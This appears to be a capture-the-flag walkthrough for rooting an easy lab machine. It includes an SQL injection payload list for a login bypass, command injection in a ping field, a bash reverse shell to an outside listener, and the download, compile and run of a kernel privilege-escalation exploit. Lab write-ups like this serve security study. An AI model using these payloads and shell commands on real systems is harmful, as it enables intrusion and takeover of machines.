Machine Info
- Difficulty: Easy
- Goal: Gain root access
Network Scanning
Netdiscover
We run netdicover to get the target ip address through host-only adapter interface (eth1).
1
2
# Kali linux terminal
netdiscover -i eth1
Nmap
We run nmap with the aggressive scan to scan all ports and discover the open ports and services on the target machine.
1
2
# Kali linux terminal
nmap -p- -A 192.168.56.111
Enumeration
Enumerating HTTP Service
As a result of nmap scan, we got a bunch of open ports and services. We start with HTTP service on port 80 and go to the website to see how it looks like. We found a login page, then first thing we do is viewing page source but we did not find anything seems to be interested. Also, we try to use some default credentials such as admin:admin or admin:password but nothing work.
Exploitation
SQL Injection
We decided to try sql injection. We enter any username and password (such as test:12345) then we launch burp suite to intercept the request and send the request to the intruder. We select the parameters (uname & psw) to replace their value with the sql payload then we set the attack type to cluster bomb to try all possible combinations of username and password.
We copy the sql payloads and paste them for the payload set 1 and payload set 2.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
'-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
' or 1=1 --
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
After that, we start the attack and some of the payloads worked and we logged in successfully.
We select one of our succeeded payloads (such as username: admin’# and password: ‘_’) and use it to login.
After we logged in, we have a page that execute ping command.
1
2
# Website text field
127.0.0.1
We try to leverage the command execution property in order to execute another command after the ping command. And we are succeeded to execute “id” command after the execution of ping command.
1
2
# Website text field
127.0.0.1; id
Therefore, we can exploit this command execution property to execute reverse shell. We open a listener on another terminal and waiiting for the reverse shell on port 4444. And we got a shell as apache user successfully.
1
2
3
# Kali linux terminal
nc -nlvp 4444
id
1
2
# Website text field
127.0.0.1; bash -i >& /dev/tcp/192.168.56.101/4444 0>&1
Post Exploitation
Privilege Escalation
After we got a shell on the target machine as apache user, we need to escalate our privileges to root user. So, we check the target kernel version and we found it “2.6.9”.
1
2
3
# Target terminal
uname -a
lsb_release -a
We use searchsploit to search for any available privilege escalation exploits for that version. After trying different privilege escalation exploits, we reached to 9545.c which is successfully worked with us.
1
2
3
# Kali linux terminal
searchsploit linux kernel centos
searchsploit -m linux/local/9545.c
And finally we got a root shell on the target machine.
1
2
# kali linux terminal
python -m SimpleHTTPServer
1
2
3
4
5
# Target terminal
cd /tmp
wget http://192.168.56.157:8000/9545.c
gcc 9545.c -o 9545
./9545
